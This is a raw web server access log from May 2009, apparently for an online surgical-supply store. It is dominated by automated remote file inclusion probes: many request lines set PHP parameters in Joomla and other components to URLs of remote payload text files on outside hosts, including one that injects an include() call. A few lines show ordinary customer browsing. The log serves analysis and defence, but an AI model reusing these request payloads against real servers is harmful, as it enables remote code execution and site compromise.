67.227.156.113 - - [13/May/2009:06:39:00 -0400] "GET //include/write.php?dir=http://tsceskina.com/images/12.TXT? HTTP/1.1" 404 216 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
67.227.156.113 - - [13/May/2009:06:39:00 -0400] "GET /logs//include/write.php?dir=http://tsceskina.com/images/12.TXT? HTTP/1.1" 404 221 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
81.175.71.121 - - [13/May/2009:06:39:22 -0400] "GET /logs/access_log.Q108062800///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
81.175.71.121 - - [13/May/2009:06:39:22 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
81.175.71.121 - - [13/May/2009:06:39:22 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 1156 "-" "Mozilla/5.0"
193.221.119.126 - - [13/May/2009:06:39:24 -0400] "GET /logs/access_log.Q109011400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
81.175.71.121 - - [13/May/2009:06:39:39 -0400] "GET /logs/access_log.Q108072700///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
24.227.40.189 - - [13/May/2009:06:39:41 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
217.160.4.250 - - [13/May/2009:06:40:07 -0400] "GET /logs/access_log.Q108101100%20%20/admin.lib.inc.php?site_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:40:11 -0400] "GET /logs//skin/zero_vote/admin.php?dir=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:40:11 -0400] "GET /logs/access_log.Q108100900//skin/zero_vote/admin.php?dir=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:40:11 -0400] "GET //skin/zero_vote/admin.php?dir=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:40:12 -0400] "GET //skin/zero_vote/admin.php?dir=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:40:12 -0400] "GET /logs//skin/zero_vote/admin.php?dir=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:40:12 -0400] "GET /logs/access_log.Q108100900//skin/zero_vote/admin.php?dir=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
208.64.202.135 - - [13/May/2009:06:40:16 -0400] "GET /logs/access_log.Q108090500/index2.php?ID=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
208.64.202.135 - - [13/May/2009:06:40:17 -0400] "GET /logs/access_log.Q109022200/index2.php?ID=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
24.227.40.189 - - [13/May/2009:06:40:20 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:40:20 -0400] "GET //skin/zero_vote/admin.php?dir=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:40:20 -0400] "GET /logs//skin/zero_vote/admin.php?dir=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:40:20 -0400] "GET /logs/access_log.Q108100900//skin/zero_vote/admin.php?dir=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
81.181.203.24 - - [13/May/2009:06:40:20 -0400] "GET //bin/TreeMenuXL.php?_SERVER[DOCUMENT_ROOT]=http://www.depo.org.pk/images/21/ts?? HTTP/1.1" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
77.221.130.19 - - [13/May/2009:06:40:38 -0400] "GET /logs/access_log.Q108052400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:06:40:38 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:06:40:38 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
172.16.1.157 - - [13/May/2009:06:40:44 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:06:40:44 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:06:40:44 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
77.221.130.19 - - [13/May/2009:06:40:59 -0400] "GET /logs/access_log.Q108060200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
201.234.41.5 - - [13/May/2009:06:41:29 -0400] "GET /logs/access_log.Q108110900/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
201.234.41.5 - - [13/May/2009:06:41:30 -0400] "GET /errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
201.234.41.5 - - [13/May/2009:06:41:30 -0400] "GET /logs/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
218.185.20.88 - - [13/May/2009:06:41:43 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:41:43 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:41:43 -0400] "GET /logs/access_log.Q109022600//components/com_simpleboard/image_upload.php?sbp=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
216.176.196.171 - - [13/May/2009:06:41:43 -0400] "GET /logs/access_log.Q108082200/errors.php?error=http://www.geocities.com/cantikpuri/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
216.176.196.171 - - [13/May/2009:06:41:43 -0400] "GET /logs/errors.php?error=http://www.geocities.com/cantikpuri/id.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
216.176.196.171 - - [13/May/2009:06:41:43 -0400] "GET /errors.php?error=http://www.geocities.com/cantikpuri/id.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
172.16.1.157 - - [13/May/2009:06:41:43 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:06:41:43 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:06:41:43 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
216.176.196.171 - - [13/May/2009:06:41:48 -0400] "GET /logs/access_log.Q108072300/errors.php?error=http://www.geocities.com/cantikpuri/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
218.185.20.88 - - [13/May/2009:06:41:57 -0400] "GET /logs/access_log.Q108083000//components/com_simpleboard/image_upload.php?sbp=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:42:19 -0400] "GET /logs/access_log.Q108100900%20%20//skin/zero_vote/admin.php?dir=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:42:41 -0400] "GET /logs/access_log.Q108100900%20%20//skin/zero_vote/admin.php?dir=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:42:44 -0400] "GET /logs/access_log.Q108100900%20%20//skin/zero_vote/admin.php?dir=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.160.201.12 - - [13/May/2009:06:42:49 -0400] "GET /logs/access_log.Q108111700%20%20//?path%5Bdocroot%5D=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
61.160.201.12 - - [13/May/2009:06:42:50 -0400] "GET //?path%5Bdocroot%5D=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
61.160.201.12 - - [13/May/2009:06:42:50 -0400] "GET /logs//?path%5Bdocroot%5D=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 200 1155 "-" "Mozilla/5.0"
78.136.7.247 - - [13/May/2009:06:42:54 -0400] "GET /logs/access_log.Q108100500/errors.php?error=http://biquad.com.br/catalog/products/1dd.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
78.136.7.247 - - [13/May/2009:06:42:55 -0400] "GET /errors.php?error=http://biquad.com.br/catalog/products/1dd.txt?? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
172.16.1.157 - - [13/May/2009:06:43:17 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:06:43:17 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:06:43:17 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
218.185.20.88 - - [13/May/2009:06:43:17 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:43:17 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:43:17 -0400] "GET /logs/access_log.Q108083000%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
67.15.48.60 - - [13/May/2009:06:43:39 -0400] "GET /logs/access_log.Q108122600//_theme/breadcrumb.php?rootBase=http://cms.halberstadtwerke.de/tip/ligen/.../ids??? HTTP/1.1" 404 247 "-" "libwww-perl/5.810"
67.15.48.60 - - [13/May/2009:06:43:39 -0400] "GET //_theme/breadcrumb.php?rootBase=http://cms.halberstadtwerke.de/tip/ligen/.../ids??? HTTP/1.1" 404 220 "-" "libwww-perl/5.810"
67.15.48.60 - - [13/May/2009:06:43:39 -0400] "GET /logs//_theme/breadcrumb.php?rootBase=http://cms.halberstadtwerke.de/tip/ligen/.../ids??? HTTP/1.1" 404 225 "-" "libwww-perl/5.810"
67.15.48.60 - - [13/May/2009:06:43:51 -0400] "GET /logs/access_log.Q108082100//_theme/breadcrumb.php?rootBase=http://cms.halberstadtwerke.de/tip/ligen/.../ids??? HTTP/1.1" 404 247 "-" "libwww-perl/5.810"
218.185.20.88 - - [13/May/2009:06:44:08 -0400] "GET /logs/access_log.Q109022600%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
77.221.130.19 - - [13/May/2009:06:44:15 -0400] "GET /logs/access_log.Q108111600/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:06:44:16 -0400] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:06:44:16 -0400] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
172.16.1.157 - - [13/May/2009:06:44:31 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:06:44:31 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:06:44:31 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
208.64.202.135 - - [13/May/2009:06:44:42 -0400] "GET /logs/access_log.Q108090500/index2.php?ID=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
208.64.202.135 - - [13/May/2009:06:44:48 -0400] "GET /logs/access_log.Q109022200/index2.php?ID=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.119.158.133 - - [13/May/2009:06:44:48 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
85.119.158.133 - - [13/May/2009:06:44:48 -0400] "GET /logs/access_log.Q109022600//components/com_simpleboard/image_upload.php?sbp=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
85.119.158.133 - - [13/May/2009:06:44:48 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
85.119.158.133 - - [13/May/2009:06:44:48 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
85.119.158.133 - - [13/May/2009:06:44:48 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
85.119.158.133 - - [13/May/2009:06:44:48 -0400] "GET /logs/access_log.Q109022600//components/com_simpleboard/image_upload.php?sbp=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
85.18.117.101 - - [13/May/2009:06:44:49 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
85.18.117.101 - - [13/May/2009:06:44:49 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
77.221.130.19 - - [13/May/2009:06:44:53 -0400] "GET /logs/access_log.Q109011400/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:06:44:53 -0400] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:06:44:54 -0400] "GET /logs/access_log.Q109011400/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 281 "-" "libwww-perl/5.805"
85.18.117.101 - - [13/May/2009:06:44:54 -0400] "GET /logs/access_log.Q109022600//components/com_simpleboard/image_upload.php?sbp=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
77.221.130.19 - - [13/May/2009:06:44:54 -0400] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:06:44:54 -0400] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:06:44:54 -0400] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
85.119.158.133 - - [13/May/2009:06:45:01 -0400] "GET /logs/access_log.Q108083000//components/com_simpleboard/image_upload.php?sbp=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
85.119.158.133 - - [13/May/2009:06:45:01 -0400] "GET /logs/access_log.Q108083000//components/com_simpleboard/image_upload.php?sbp=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
61.160.201.12 - - [13/May/2009:06:45:09 -0400] "GET /logs/access_log.Q108082000%20%20//?path%5Bdocroot%5D=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
85.18.117.101 - - [13/May/2009:06:45:28 -0400] "GET /logs/access_log.Q108083000//components/com_simpleboard/image_upload.php?sbp=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:45:34 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:45:34 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:45:34 -0400] "GET /logs/access_log.Q109022600//components/com_simpleboard/image_upload.php?sbp=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
172.16.1.157 - - [13/May/2009:06:45:41 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:06:45:41 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:06:45:41 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
218.185.20.88 - - [13/May/2009:06:45:53 -0400] "GET /logs/access_log.Q108083000//components/com_simpleboard/image_upload.php?sbp=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
77.221.130.19 - - [13/May/2009:06:46:22 -0400] "GET /logs/access_log.Q108120400/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:06:46:32 -0400] "GET /logs/access_log.Q108120400/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 281 "-" "libwww-perl/5.805"
85.119.158.133 - - [13/May/2009:06:46:42 -0400] "GET /logs/access_log.Q109022600%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
85.119.158.133 - - [13/May/2009:06:46:43 -0400] "GET /logs/access_log.Q109022600%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
85.119.158.133 - - [13/May/2009:06:46:46 -0400] "GET /logs/access_log.Q108083000%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:46:46 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:46:46 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:46:46 -0400] "GET /logs/access_log.Q109022600//components/com_simpleboard/image_upload.php?sbp=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
85.119.158.133 - - [13/May/2009:06:46:48 -0400] "GET /logs/access_log.Q108083000%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:47:00 -0400] "GET /logs/access_log.Q108083000//components/com_simpleboard/image_upload.php?sbp=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
153.2.247.32 - - [13/May/2009:06:47:31 -0400] "GET /images/psearch_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
153.2.247.32 - - [13/May/2009:06:47:31 -0400] "GET /images/login_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
153.2.247.32 - - [13/May/2009:06:47:31 -0400] "GET /images/login_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
153.2.247.32 - - [13/May/2009:06:47:31 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
85.18.117.101 - - [13/May/2009:06:47:52 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
85.18.117.101 - - [13/May/2009:06:47:52 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
85.18.117.101 - - [13/May/2009:06:47:55 -0400] "GET /logs/access_log.Q109022600//components/com_simpleboard/image_upload.php?sbp=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:48:00 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:48:00 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:48:00 -0400] "GET /logs/access_log.Q109022600//components/com_simpleboard/image_upload.php?sbp=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
153.2.247.32 - - [13/May/2009:06:47:58 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):02421311 HTTP/1.0" 200 45282 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
153.2.247.32 - - [13/May/2009:06:48:00 -0400] "GET /images/head_aceLogo.gif HTTP/1.0" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):02421311" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
153.2.247.32 - - [13/May/2009:06:48:00 -0400] "GET /images/head_btn-products.gif HTTP/1.0" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):02421311" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
153.2.247.32 - - [13/May/2009:06:48:00 -0400] "GET /images/head_btn-shop.gif HTTP/1.0" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):02421311" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
153.2.247.32 - - [13/May/2009:06:48:01 -0400] "GET /images/head_btn-brochures.gif HTTP/1.0" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):02421311" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
153.2.247.32 - - [13/May/2009:06:48:01 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.0" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):02421311" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
153.2.247.32 - - [13/May/2009:06:48:01 -0400] "GET /images/head_btn-space1.gif HTTP/1.0" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):02421311" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
153.2.247.32 - - [13/May/2009:06:48:01 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.0" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):02421311" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
